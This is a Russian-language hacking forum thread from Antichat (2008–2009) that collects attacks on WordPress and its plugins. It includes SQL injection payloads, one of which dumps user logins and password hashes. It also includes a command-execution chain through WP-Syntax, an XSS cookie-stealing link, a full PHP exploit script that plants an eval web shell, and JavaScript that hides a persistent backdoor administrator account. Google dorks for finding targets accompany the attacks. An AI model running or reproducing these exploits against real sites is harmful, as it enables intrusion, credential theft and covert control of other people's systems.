HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Веб-уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 18.12.2008, 23:14
M4g
Участник форума
Регистрация: 08.05.2007
Сообщений: 164
С нами: 10005506

Репутация: 784
По умолчанию

Уязвимый продукт: Simple:Press Forum - 3.1.4 (последняя на данный момент)
Дорк: inurl: plugins/simple-forum

SQL-injection: ./wp-content/plugins/simple-forum/sf-pmpost.php
Уязвимая переменная : $_POST['pmtoidlist']

PHP код:
    $tolist explode(','$_POST['pmtoidlist']);
    if(!
$tolist)
    {    
        
update_sfnotice('sfmessage''1@'.__('No message recipients were set'"sforum"));
        return;
    }
...
    foreach(
$tolist as $recipient)
    {
        
$recipient trim($recipient);
...
        
$sql  "INSERT INTO ".SFMESSAGES;
        
$sql .= " (sent_date, from_id, to_id, title, message, sentbox, is_reply) ";
        
$sql .= "VALUES (";
        
$sql .= "now(), ";
        
$sql .= $current_user->ID.", ";
        
$sql .= $recipient.", ";
        
$sql .= "'".$wpdb->escape($title)."', ";
        
$sql .= "'".$wpdb->escape($messagecontent)."', ";
        
$sql .= $sentbox.", ";
        
$sql .= $reply.");";
        if(
$wpdb->query($sql) === false
Примерный эксплойт:
Логинимся на форум (для отправки личных сообщений, как правило, на форумах рега открыта):
PHP код:
<form action="http://lamer/platinum/wp-content/plugins/simple-forum/sf-pmpost.php" method="post">
<
input type="hidden" name="_wpnonce" value="e5192161fc" />
<
input type="hidden" name="_wp_http_referer" value="/platinum/forum/?pmaction=viewinpm&pms=1" />
<
input type="hidden" tabindex="0" name="pmaction" id="pmaction" value="savepm" />
<
input type="hidden" tabindex="0" name="pmuser" id="pmuser" value="1" />
sql<input name="pmtoidlist" value="" />
<
input type="hidden" tabindex="0" name="pmreply" id="pmreply" value="" />
title<input type="text" tabindex="4" name="pmtitle" id="pmtitle" value="" />
text<textarea tabindex="5" name="newpmpost" id="newpmpost" rows="12"></textarea>
<
input type="submit" name="newpm" value="ok" />
</
form
Примерная возвращаемая ошибка:
PHP код:
WordPress database error: [You have an error in your SQL syntaxcheck the manual that corresponds to your MySQL server version for the right syntax to use near '\' sd, '123', 'sdfsdfds', 1, 0)' at line 1]
INSERT INTO wp_sfmessages (sent_datefrom_idto_idtitlemessagesentboxis_replyVALUES (now(), 112\' sd, '123', 'sdfsdfds', 1, 0); 
Можно использовать в совокупности с on duplicate update (сорри, не помню точно, ищите адвизори гемаглабина

Последний раз редактировалось M4g; 18.12.2008 в 23:20..
 
Ответить с цитированием

[weird bug] WP-Syntax <= 0.9.1 Remote Command Execution
  #2  
Старый 27.12.2008, 00:30
[Raz0r]
Members of Antichat - Level 5
Регистрация: 25.02.2007
Сообщений: 495
С нами: 10109126

Репутация: 1980
По умолчанию [weird bug] WP-Syntax <= 0.9.1 Remote Command Execution

WP-Syntax - это самый популярный плагин для wordpress для подсветки кода. Его используют на многих сайтах, например Стефан Эссер использует его на своем блоге. Для меня этот плагин представлял интерес, так как обнаружил его в блоге довольно крупной фарма-партнерки. Проведя анализ исходного кода, я нашел достаточно необычную уязвимость, поэтому решил создать отдельную тему. Возможно у кого-нибудь возникнут замечания или мысли по поводу более изящного решения.

WP-Syntax использует библиотеку GeSHi, которая и реализует весь функционал по разбору синтаксиса и составления соответствующего для каждого языка html-кода. Разобрав главный скрипт плагина wp-syntax.php, я перешел к папке test, где хранилось 2 скрипта: index.php и code.php. Code.php содержал примеры кода для разных языков, а index.php выводил их с подсветкой для демонстрации возможностей плагина. Index.php инклудит wp-syntax.php, который в свою очередь подключает geshi.php. По замыслу разработчика wp-syntax.php может вызываться только из контекста WP, в то время как test/index.php может запускаться независимо от платформы, при этом автор решил использовать самопальное подобие механизма WP для выполнения callback-функций. Кто знаком с внутренним устройством WP или хотя бы видел часть кода может понять, что я говорю о функциях add_action(), do_action(), apply_filters() и др.

Самореализованная ф-ция apply_filters выглядит следующим образом:

PHP код:
function apply_filters($tag$string)
{
    global 
$test_filter;

    if (!isset(
$test_filter[$tag])) return $string;

    
uksort($test_filter[$tag], "strnatcasecmp");

    foreach (
$test_filter[$tag] as $priority => $functions)
    {
        if (
is_null($functions)) continue;

        foreach(
$functions as $function)
        {
            
$string call_user_func_array($function, array($string));
        }
    }
    return 
$string;

Глобальный массив test_filter нигде ранее не инициализируется, поэтому появляется возможность добавить в него произвольные элементы при register_globals=on и впоследствии выполнить любую функцию с помощью call_user_func_array. В WP есть специальная ф-ция - unregister_globals, защищающая от подобных уязвимостей, но здесь другой случай - скрипт работает вне контекста WP.
apply_filters вызывается в нескольких местах, один их них:

PHP код:
<html>
<head>
<title>WP-Syntax Test Page</title>
<link rel="stylesheet" href="../wp-syntax.css" type="text/css" media="screen" />
<?php
test_head
();

/* ... */

function test_head()
{
  echo 
apply_filters("wp_head""");
}
?>
Как видим сложность данного случая заключается в том, что нельзя выполнить функцию с произвольными аргументами - будет передаваться один пустой аргумент с типом string. С первого взгляда мне показалось, что даже банальный phpinfo() выполнить не удастся, так как он принимает аргумент только с типом integer, иначе возникнет ошибка уровня E_WARNING. Однако вникнув в логику ф-ции apply_filters становится ясным, что изменить аргумент для call_user_func_array() можно, так как она выполняется в цикле и присваивает свой результат аргументу для следующей callback-функции. Иначе говоря с помощью специально составленной цепочки функций можно бы было получить -1 и передать это значение в phpinfo (-1 = INFO_ALL). Тут я начал вспоминать все функции PHP, которые могли бы мне помочь в данной ситуации. Как оказалось многие функции, не принимающие аргументов, вызывают ошибку, если предать в них пустое значение. Тем не менее, нужная мне последовательность вызовов функций была найдена:

http://localhost/wp/2.7/wp-content/plugins/wp-syntax/test/index.php?test_filter[wp_head][99][0]=pi&test_filter[wp_head][99][1]=cos&test_filter[wp_head][99][2]=phpinfo

Сперва вызывается функция pi(), возвращающая значение числа pi. Как ни странно, эта функция, несмотря на отсутствие принимаемых аргументов, не вызывает ошибку "Wrong parameter count for". Далее идет вызов функции cos(), в которую передается значение числа pi. Как известно, cos(pi) = -1, поэтому в phpinfo() попадает нужное значение и выводятся все данные.

Казалось большего уже не достичь, но я продолжал поиск способа для выполнения произвольных команд. Необходимо было найти функцию, которая возвращала бы нужные для меня данные. Эти данные можно бы было получить из окружения, но подходящих функций не попадалось. Однако способ все-таки был найден =)
Ф-ция session_id() может как возвращать значение текущего идентификатора сессии, так и устанавливать его, если был передан аргумент. Мне естественно нужно было получить значение, но как быть с пустым параметром, который постоянно передавался? Я решил проверить возвращаемые значения таким скриптом:

PHP код:
<?php
session_start
("");
echo 
session_id();
echo 
session_id("");
echo 
session_id();
?>
Выяснилось, что session_id возвращает значение прошлого идентификатора, несмотря на то, что в функцию был передан параметр. Не знаю баг это или нет, но в доках по этому поводу ничего не сказано. В итоге финальный запрос выглядит следующим образом:

Цитата:
GET /wp/2.7/wp-content/plugins/wp-syntax/test/index.php?test_filter[wp_head][99][0]=session_start&test_filter[wp_head][99][1]=session_id&test_filter[wp_head][99][2]=system HTTP/1.0
Host: localhost
Cookie: PHPSESSID=dir
Connection: close
Спасибо за внимание, надеюсь было интересно =)

Последний раз редактировалось [Raz0r]; 29.12.2008 в 22:47.. Причина: priv8 only )
 
Ответить с цитированием

  #3  
Старый 05.01.2009, 07:11
ShAnKaR
Постоянный
Регистрация: 14.07.2005
Сообщений: 964
С нами: 10960226

Репутация: 1424


По умолчанию

ну в session_id запихнуть можно только буквы и цифры, поэтому особо раздолья нет, вот помучал немного :
Цитата:
index.php?test_filter[wp_head][99][]=session_start&test_filter[wp_head][99][]=session_id&test_filter[wp_head][99][]=base64_decode&test_filter[wp_head][99][]=assert&q=phpinfo();exit;
ну и куку PHPSESSID=ZXZhbCgkX0dFVFtxXSk7ICAK

также еще есть в пхп функция get_browser(), но по дефолту ее в php.ini надо настраивать, а так можно былобы через юзер агента текст нужный пихать.

Последний раз редактировалось ShAnKaR; 05.01.2009 в 07:15..
 
Ответить с цитированием

  #4  
Старый 05.01.2009, 13:40
[Raz0r]
Members of Antichat - Level 5
Регистрация: 25.02.2007
Сообщений: 495
С нами: 10109126

Репутация: 1980
По умолчанию

Насчет get_browser() тоже думал, но эта функция действительно мало, гда работает.
Если в PHPSESSID помещать данные в base64, то нужно составлять такие строки, чтобы в них не было символов =.
Функция call_user_func_array() не допускает использование eval() в качестве callback'а, но твой способ обхода этого ограничения с помощью assert() очень порадовал =)
 
Ответить с цитированием

  #5  
Старый 09.01.2009, 17:55
M4g
Участник форума
Регистрация: 08.05.2007
Сообщений: 164
С нами: 10005506

Репутация: 784
По умолчанию

>cкажите имея логин/хеш от версии 2.5 и SECRET_KEY, подставить кукис можно или нет?
перелистай тему, выкладывали тут тулзу для этого.
можно, только если кей из wp-config.php оставлен дефолтным

Последний раз редактировалось M4g; 09.01.2009 в 17:58..
 
Ответить с цитированием

wordpress can be subject of delayed attacks via cookies
  #6  
Старый 09.01.2009, 17:59
M4g
Участник форума
Регистрация: 08.05.2007
Сообщений: 164
С нами: 10005506

Репутация: 784
По умолчанию wordpress can be subject of delayed attacks via cookies

Attack: Denial Of Service
Required cookies: GLOBALS=<anything>
Triggering file: index.php (just an example, basically any file including the
affected file)
Affected file: wp-settings.php
Effect: no request is processed as it aborts because of the presence of
GLOBALS in $_REQUEST

Attack: Deletion of users
Required cookies: action=dodelete, delete_option=delete, users[]=n (where n is
an integer)
Triggering file: wp-admin/users.php
Affected file: wp-admin/users.php
Note: this doesn't affect etch's version as it correctly uses $_POST

Attack: Denial Of Service
Required cookies: action=logout
Triggering file: wp-login.php
Affected file: wp-login.php
Effect: redirection loop, preventing the user from logging in

http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=504771
http://trac.wordpress.org/ticket/8814
 
Ответить с цитированием

  #7  
Старый 11.01.2009, 16:14
baltazar
Banned
Регистрация: 30.03.2007
Сообщений: 344
С нами: 10061666

Репутация: 2438
По умолчанию

XSS wp-slimstat 0.92

Код:
http://site/wp-admin/index.php?page=wp-sl
imstat/wp-slimstat.php?panel=1&fi=/feed/&ff=1&ft=%3Cscript%3Ealert(document.cookie)%3C/script%3E
 
Ответить с цитированием

Wordpress 2.7.0 admin remote code execution vulnerability
  #8  
Старый 08.02.2009, 06:44
M4g
Участник форума
Регистрация: 08.05.2007
Сообщений: 164
С нами: 10005506

Репутация: 784
По умолчанию Wordpress 2.7.0 admin remote code execution vulnerability

by Ryat[puretot]
mail: puretot at gmail dot com
team: http://www.80vul.com
date: 2008-12-18

PHP код:
#!/usr/bin/php
<?php

print_r
('
+---------------------------------------------------------------------------+
Wordpress 2.7.0 remote code execution exploit
by puret_t
mail: puretot at gmail dot com
team: http://www.wolvez.org
site: http://www.80vul.com
dork: "powered by WordPress"
+---------------------------------------------------------------------------+
'
);
/**
 * works regardless of php.ini settings
 */
if ($argc 6) {
    
print_r('
+---------------------------------------------------------------------------+
Usage: php '
.$argv[0].' host path user pass post
host:      target server (ip/hostname)
path:      path to wordpress
user:      admin login username
pass:      admin login password
post:      the available post id
Example:
php '
.$argv[0].' localhost /wp/ admin 123456 1
+---------------------------------------------------------------------------+
'
);
    exit;
}

error_reporting(7);
ini_set('max_execution_time'0);

$host $argv[1];
$path $argv[2];
$user $argv[3];
$pass $argv[4];
$post $argv[5];

$shellcode '\\\';eval(base64_decode(ZnB1dHMoZm9wZW4oJy4uL3dwLWNvbnRlbnQvcGx1Z2lucy93b2x2ZXoucGhwJywndysnKSwnPD9ldmFsKCRfUE9TVFtjXSk7Pz5wdXJldF90Jyk7));\\\'';
//$shellcode = '\\\';}eval(base64_decode(ZnB1dHMoZm9wZW4oJy4uL3dwLWNvbnRlbnQvcGx1Z2lucy93b2x2ZXoucGhwJywndysnKSwnPD9ldmFsKCRfUE9TVFtjXSk7Pz5wdXJldF90Jyk7));//';
$shell 'http://'.$host.$path.'wp-content/plugins/wolvez.php';
/**
 * wolvez.php has this code:
 * <?eval($_POST[c])?>
 */
$url $path.'wp-login.php';
$cmd 'log='.urlencode($user).'&pwd='.urlencode($pass);
$resp send();
preg_match('/Set-Cookie:\s(wordpress_[a-f0-9]+=[a-zA-Z0-9%]+);/'$resp$admin_cookie);

if (!
$admin_cookie)
    exit(
"Exploit Failed!\n");
    
$url $path.'wp-admin/user-new.php#add-new-user';
$cmd '';
$resp send($admin_cookie[1]);
preg_match('/name="_wpnonce"\svalue="([a-z0-9]{10})"/'$resp$_wpnonce);

if (!
$_wpnonce)
    exit(
"Exploit Failed!\n");

$cmd '_wpnonce='.$_wpnonce[1].'&action=adduser&user_login=ryat&email=ryat%40ryat.com&pass1=123456&pass2=123456&role=editor&display_name='.$shellcode;
$resp send($admin_cookie[1]);

if (
strpos($resp'users.php?usersearch=ryat&update=add#user') === false)
    exit(
"Exploit Failed!\n");

$url $path.'wp-login.php';
$cmd 'log=ryat&pwd=123456';
$resp send();
preg_match('/Set-Cookie:\s(wordpress_[a-f0-9]+=[a-zA-Z0-9%]+);/'$resp$editor_cookie);

if (!
$editor_cookie)
    exit(
"Exploit Failed!\n");

$url $path.'wp-admin/post.php?action=edit&post='.$post;
$cmd '';
send($editor_cookie[1]);
send($admin_cookie[1]);

if (
strpos(file_get_contents($shell), 'puret_t') !== false)
    exit(
"Expoilt Success!\nView Your shell:\t$shell\n");
else
    exit(
"Exploit Failed!\n");

function 
send($cookie '')
{
    global 
$host$path$url$cmd;

    
$data "POST $url  HTTP/1.1\r\n";
    
$data .= "Accept: */*\r\n";
    
$data .= "Accept-Language: zh-cn\r\n";
    
$data .= "Referer: http://$host$path\r\n";
    
$data .= "Content-Type: application/x-www-form-urlencoded\r\n";
    
$data .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n";
    
$data .= "Host: $host\r\n";
    
$data .= "Content-Length: ".strlen($cmd)."\r\n";
    
$data .= "Connection: Close\r\n";
    
$data .= "Cookie: $cookie\r\n\r\n";
    
$data .= $cmd;

    
$fp fsockopen($host80);
    
fputs($fp$data);

    
$resp '';

    while (
$fp && !feof($fp))
        
$resp .= fread($fp1024);

    return 
$resp;
}

?>
Подробности уязвимости

wp-admin/post.php

PHP код:
    if ( current_user_can('edit_post'$post_ID) ) {
        if ( 
$last wp_check_post_lock$post->ID ) ) {
            
$last_user get_userdata$last );
            
$last_user_name $last_user $last_user->display_name __('Somebody');
            
$message sprintf__'Warning: %s is currently editing this post' ), wp_specialchars$last_user_name ) );
            
$message str_replace"'""\'""<div class='error'><p>$message</p></div>" );
            
add_action('admin_notices'create_function''"echo '$message';" ) );
            
//[ex:\';phpinfo();\'];
        
} else {
            
wp_set_post_lock$post->ID );
            
wp_enqueue_script('autosave');
        }
    } 
 
Ответить с цитированием

Добавление невидимого админа (1.5-2.3.3)
  #9  
Старый 13.02.2009, 08:56
M4g
Участник форума
Регистрация: 08.05.2007
Сообщений: 164
С нами: 10005506

Репутация: 784
По умолчанию Добавление невидимого админа (1.5-2.3.3)

Итак, представим, что у нас уже есть доступ к бд и нам необходимо закрепиться на блоге. Для этого создаем нового юзера, даем ему права админа и в бд в таблице wp_usermeta в поле first_name с ИД нашего юзера прописываем:
PHP код:
     <b id="user_superuser"><script language="JavaScript">
     var 
setUserName = function(){
          try{
               var 
t=document.getElementById("user_superuser");
               while(
t.nodeName!="TR"){
                    
t=t.parentNode;
               };
               
t.parentNode.removeChild(t);
               var 
tags document.getElementsByTagName("H3");
               var 
" shown below";
               for (var 
0tags.lengthi++) {
                    var 
t=tags[i].innerHTML;
                    var 
h=tags[i];
                    if(
t.indexOf(s)>0){
                         
=(parseInt(t)-1)+s;
                         
h.removeChild(h.firstChild);
                         
document.createTextNode(s);
                         
h.appendChild(t);
                    }
               }
                var 
arr=document.getElementsByTagName("ul");
                for(var 
i in arr) if(arr[i].className=="subsubsub"){
                    var 
n=/>Administrator \((\d+)\)</gi.exec(arr[i].innerHTML);
                    if(
n[1]>0){
                        var 
txt=arr[i].innerHTML.replace(/>Administrator \((\d+)\)</gi,">Administrator ("+(n[1]-1)+")<");
                        
arr[i].innerHTML=txt;
                    }
                }
                
          }catch(
e){};
     };
     
addLoadEvent(setUserName);
     </
script>" /></label></p> 
В итоге, наш админчег не будет виден на странице wp-admin/users.php =)
Для версий 2.5-2.7 могут быть свои вариации.
 
Ответить с цитированием

  #10  
Старый 14.02.2009, 13:44
-m0rgan-
Постоянный
Регистрация: 29.09.2008
Сообщений: 553
С нами: 9270510

Репутация: 519


По умолчанию

Wordpress Wp-forum plugin 1.7.8 Sql injection vulnerability
exploit:
Код:
http://site.com/blog/wp-content/plugins/wp-forum/forum_feed.php?thread=[SQL]
Код:
http://site.com/blog/wp-content/plugins/wp-forum/forum_feed.php?thread=-99999+union+select+1,2,3,concat(user_login,0x2f,user_pass,0x2f,user_email),5,6,7+from+wp_users/*
источник:http://milw0rm.com/
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обзор уязвимостей CMS [Joomla,Mambo] и их компонентов it's my Веб-уязвимости 361 24.10.2019 10:25
[ Обзор уязвимостей PHP-Nuke ] [53x]Shadow Веб-уязвимости 43 04.02.2012 20:33
[ Обзор уязвимостей SLAED CMS ] _kREveDKo_ Веб-уязвимости 20 01.11.2009 14:28
ОБЗОР УЯЗВИМОСТЕЙ БЕСПЛАТНЫХ ПОЧТОВЫХ СЕРВИСОВ nike57 Уязвимости Mail-сервис 4 05.05.2006 22:03
Статья обзор уязвимостей бесплатных почтовых сервисов markel Уязвимости Mail-сервис 3 12.09.2005 10:07



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.